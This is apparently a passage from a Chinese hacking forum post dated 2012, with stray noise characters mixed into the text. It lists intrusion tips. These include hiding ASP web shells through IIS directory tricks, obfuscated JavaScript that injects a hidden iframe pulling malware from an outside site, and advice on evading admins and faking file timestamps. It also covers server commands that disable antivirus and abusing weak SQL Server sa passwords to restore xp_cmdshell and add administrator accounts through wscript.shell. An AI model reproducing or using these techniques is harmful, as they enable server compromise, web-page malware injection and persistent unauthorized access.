; l3 e z& s3 |拷贝ASP木马至目录:copy c:\inetpub\wwwroot\dbm6.asp c:\inetpub\wwwroot\images..\news.asp
" m' s4 z6 j' _6 T通过web访问ASP木马:http://ip/images../news.asp?action=login
% ?! J% j2 l8 S3 u M如何删除非标准目录:rmdir images..\ /s2 m3 J0 ?# g+ X# H0 O
2、Windows中的IIS会对以.asp结尾的目录中的文件进行解析,以达到我们隐藏自己的网页后门的目的:
* D. ~3 D" `; m3 ^- vmkdir programme.asp2 x. `4 A, v/ N8 V% W
新建1.txt文件内容:<!--#include file=”12.jpg”-->
" W: F9 p6 X/ W- J' w* @9 z5 Q新建12.jpg文件内容:<%execute(request("l"))%> 或使用GIF与ASP合并后的文件4 G) H! t! C# e* L1 I6 E2 T
attrib +H +S programme.asp
9 [8 }$ U+ ]( E' B7 l. m通过web访问ASP一句话木马:http://ip/images/programme.asp/1.txt
% c! V! G* R* q4 C: b. D9 z. r. _
: r2 p5 j9 f* N! I" p8 h. V; T: [54、attrib /d /s c:\windows +h +s,后windows目录变为隐藏+系统,隐藏属性为灰不可更改,windows目录下面的文件和目录并没有继承属性,原来是什么样还是什么样。' y. `" I/ N4 e8 a
然后在利用attrib /d /s c:\windows -h -s,windows目录可以显示,隐藏属性可以再次选中。8 s. D9 W2 L1 v- |# Z& h4 M
, R6 s+ m7 ^% v* H" n55、JS隐蔽挂马1 R) M s" X' \! ~4 h3 Z5 z
1.
/ f* r* M) G$ k) [var tr4c3="<iframe src=ht";
7 p2 p2 `: u8 G7 ztr4c3 = tr4c3+"tp:/";1 ~; y e g; d' b
tr4c3 = tr4c3+"/ww";5 k. O+ a4 W, V% s4 t
tr4c3 = tr4c3+"w.tr4";- o8 [' F8 K. j4 ~: w
tr4c3 = tr4c3+"c3.com/inc/m";
" r, n# f0 b: Z+ Vtr4c3 = tr4c3+"m.htm style="display:none"></i";
5 X$ u( u2 {+ w8 [tr4c3 =tr4c3+"frame>'";& \! c B1 D. W9 O8 Q* I7 I
document.write(tr4c3);
0 [( t, G [$ t2 u9 R避免被管理员搜索网马地址找出来。把变量名定义的和网站本身的接近些,混淆度增加。3 d t; v8 P, j6 J! V
8 ?4 ?* y# M7 X$ G- j2.
4 k1 Q: H0 n* G. F9 P* G5 Q3 g! z转换进制,然后用EVAL执行。如
2 L3 o" L3 t3 J+ Yeval("\144\157\143\165\155\145\156\164\56\167\162\151\164\145\40\50\42\74\151\146\162\141\155\145\40\163\162\143\75\150\164\164\160\72\57\57\167\167\167\56\164\162\64\143\63\56\143\157\155\57\151\156\143\57\155\155\56\150\164\155\40\163\164\171\154\145\75\42\42\144\151\163\160\154\141\171\72\156\157\156\145\42\42\76\74\57\151\146\162\141\155\145\76\42\51\73");# b U9 ]6 ]% O1 j% S) K. c
不过这个有点显眼。6 X# Y) C3 O+ q/ W$ N A( {
3.0 p( \: T2 H& r v
document.write ('<iframe src=http://www.tr4c3.com/inc/mm.htm style="display:none"></iframe>');6 f2 N5 {) n- j
最后一点,别忘了把文件的时间也修改下。
6 U9 [+ X7 ^! }; l. L! \& Y0 o/ f* S# H
56.3389终端入侵常用DOS命令
3 R! d- y/ ^$ _& a9 G- D, l* Ctaskkill taskkill /PID 1248 /t
8 s/ {; G9 I/ L
2 D, c( H% H0 |9 Itasklist 查进程6 ^% @/ k/ P. ^3 d
- y5 s) u( Q( y$ D! A0 r+ p* T% Rcacls "C:\Program Files\ewido anti-spyware 4.0\guard.exe" /d:everyone 改、降低某文件权限: O: @3 V v8 r o& _7 }
iisreset /reboot' ^9 O; R( u( [) d; r5 O; U# e
tsshutdn /reboot /delay:1 重起服务器% u- v. K1 e& `* {( u- T( j
% g3 ]7 R- _1 y8 j+ D2 m1 R* m
logoff 12 要使用会话 ID(例如,会话 12)从会话中注销用户, d3 s0 `* J" T+ Y" A- I
, ^7 g3 V5 v; B" {: `" yquery user 查看当前终端用户在线情况
: o6 v4 f0 Q) s2 b0 K M
( G" z A; r1 N" B2 s+ m* n7 J' s要显示有关所有会话使用的进程的信息,请键入:query process *
, u+ J; ~: X& x+ H& O8 W- q. J* q% M, w |
要显示有关会话 ID 2 使用的进程的信息,请键入:query process /ID:2
* w1 B5 E* V" W, [
5 v9 r, {0 }. {要显示有关服务器 SERVER2 上所有活动会话的信息,请键入:query session /server:SERVER2- y. P" s& f3 B! x r
5 w T$ j, q+ g! K* C* A; q
要显示有关当前会话 MODEM02 的信息,请键入:query session MODEM02
/ D: q* M% I, u2 } k& l
; f4 v- A) Z" T* O, h命令列:rundll32.exe user.exe,restartwindows 功能: 系统重启
1 N. ?/ Y- a; o6 s- J8 s
3 A" [+ s! j! i; ?: l命令列:rundll32.exe user.exe,exitwindows 功能: 关闭系统
1 _$ v% L- ]! K j- p: f b+ j' g% S/ x3 z5 o
命令列: rundll32.exe user.exe,restartwindows 功能: 强行关闭所有程式并重启机器。8 x, k: K( M, ]4 b. v! Y
- N% ~% e' {# _6 F c命令列: rundll32.exe user.exe,exitwindows 功能: 强行关闭所有程式并关机6 ~* `* V+ y& ^/ [" h
3 S2 a, }3 n3 Z2 |0 { ?/ p6 W. K56、在地址栏或按Ctrl+O,输入:
9 k1 M l0 v% M' @$ A5 \: }+ [: ^javascript:s=document.documentElement.outerHTML;document.write('<body></body>');document.body.innerText=s;
6 J+ z' `9 p+ i8 L) f, }1 Q# X' l$ }4 a4 }3 o1 `- T5 F: B# E
源代码就出来了。不论加密如何复杂,最终都要还原成浏览器可以解析的html代码,而documentElement.outerHTML正是最终的结果。
/ B+ s" N6 h+ |2 `
: o M# t; A6 _; V3 ]57、net user的时候,是不能显示加$的用户,但是如果不处理的话,
6 q2 @3 O+ A4 D+ u' J% q" p% Y用net localgroup administrators是可以看到管理组下,加了$的用户的。, W& q. h% S, f+ d1 n# H6 {
/ K) t" v1 i& ~# h; l
58、 sa弱口令相关命令$ @5 X" J: t! @' m2 [
a2 h+ I+ A- {1 |0 \: X- y
一.更改sa口令方法:% p, S7 G7 Z7 a$ ]# ]9 k+ o- e; U$ J- D
用sql综合利用工具连接后,执行命令:
1 m; Q2 z- m) p9 {6 r: yexec sp_password NULL,'20001001','sa'
$ {8 ?' n9 U) ?& q(提示:慎用!)- `3 a' H# g# H3 @7 p# P
( a' C' `( u0 n( O# Z1 u, m
二.简单修补sa弱口令.' }: s# Y. I" T
; J7 g" y$ N- E1 J方法1:查询分离器连接后执行:3 g7 ^$ E# o1 {6 s3 O. ^0 p z
if exists (select * from
# A- z0 {9 |2 A: h, {6 Gdbo.sysobjects where id = object_id(N'[dbo].[xp_cmdshell]') and+ p: M! p7 X8 I9 f9 V) B. C
OBJECTPROPERTY(id, N'IsExtendedProc') = 1)+ c3 D& }/ i _! x
% h- D& e& f" G; } l; Pexec sp_dropextendedproc N'[dbo].[xp_cmdshell]'
& A2 O( w, p8 F
W$ R+ t, s' N8 f3 V% nGO
$ j& C5 C* b" Z, J* |6 N! ]' @ ]& e/ T7 d' X
然后按F5键命令执行完毕: Z* ?# l: {0 ?
& D. f: o; f; r( v, k
方法2:查询分离器连接后
! Z. q# K( U* m) b第一步执行:use master
% H+ Q0 W- d' m/ Y第二步执行:sp_dropextendedproc 'xp_cmdshell'
! [$ S+ ]4 O; Q, h7 \然后按F5键命令执行完毕
4 c' ]7 a% R# f% E1 C+ d7 f2 O2 v( t3 x5 \
* P1 p) G9 ?) A4 \+ t三.常见情况恢复执行xp_cmdshell.
$ e( M+ L- v q6 y1 ?) J$ O6 H2 W* h
" e% l* P' `" O" `8 k
1 未能找到存储过程'master..xpcmdshell'.
( v6 ~( A, \ E& L' o 恢复方法:查询分离器连接后,
) D; F; M% {9 Q+ r; a第一步执行:EXEC sp_addextendedproc xp_cmdshell,@dllname ='xplog70.dll'declare @o int
7 m8 W" @9 J, N+ N8 }1 ~( r第二步执行:sp_addextendedproc 'xp_cmdshell', 'xpsql70.dll'
/ ~$ f, g% o. V7 W5 k' d4 e% [然后按F5键命令执行完毕5 C+ b. L% v z5 H
5 j1 `& S$ c4 t' P2 无法装载 DLL xpsql70.dll 或该DLL所引用的某一 DLL。原因126(找不到指定模块。)
0 v4 {/ N& P7 I0 ?恢复方法:查询分离器连接后,1 ~) c" l0 e/ m6 ~
第一步执行:sp_dropextendedproc "xp_cmdshell" z# a3 A+ | ~( P+ A9 x
第二步执行:sp_addextendedproc 'xp_cmdshell', 'xpsql70.dll'/ }9 C& ]5 o7 ~
然后按F5键命令执行完毕/ { h# z: ^1 ~) X/ v
4 }' {' K$ V* g' k! n5 k8 ]
3 无法在库 xpweb70.dll 中找到函数 xp_cmdshell。原因: 127(找不到指定的程序。). S5 \" d: u0 v( d
恢复方法:查询分离器连接后,
* e, y/ E* [$ P6 f第一步执行:exec sp_dropextendedproc 'xp_cmdshell'
7 y8 B J2 M" s$ m第二步执行:exec sp_addextendedproc 'xp_cmdshell','xpweb70.dll'
1 B" A; _; e% g3 i然后按F5键命令执行完毕
) a% s: K. S. U( g
* Z4 _" [7 d3 q* w0 i) W四.终极方法.# A5 E, y; F7 |0 }2 E: p# H
如果以上方法均不可恢复,请尝试用下面的办法直接添加帐户:
, Y3 q! ?! J" V" m6 m' m4 e查询分离器连接后,% z9 {$ U$ M8 a' f( }# [
2000servser系统:
E; u* g+ R# T% g, ?$ _+ Y. Sdeclare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\winnt\system32\cmd.exe /c net user 用户名 密码 /add'9 }, c3 m1 k( q. Z( S6 P- a3 n4 `/ H
. `6 b( F7 J: g$ x* g
declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\winnt\system32\cmd.exe /c net localgroup administrators 用户名 /add'" M! o$ d# L; g& u
3 l6 j) i7 e; q5 @- H8 I; ^xp或2003server系统:* g! [& r. ?0 N9 v" q8 V
+ z2 k2 j' _ _7 l/ |0 i+ ndeclare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c net user 用户名 密码 /add'/ `8 o# v8 A; r6 L2 Q& H$ }
+ v1 j$ }/ Q# a1 c0 h$ C pdeclare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c net localgroup administrators 用户名 /add'
' l7 M0 a. w& r6 Y% ~ |
发表于 2012-9-15 14:13:15
收藏
支持
反对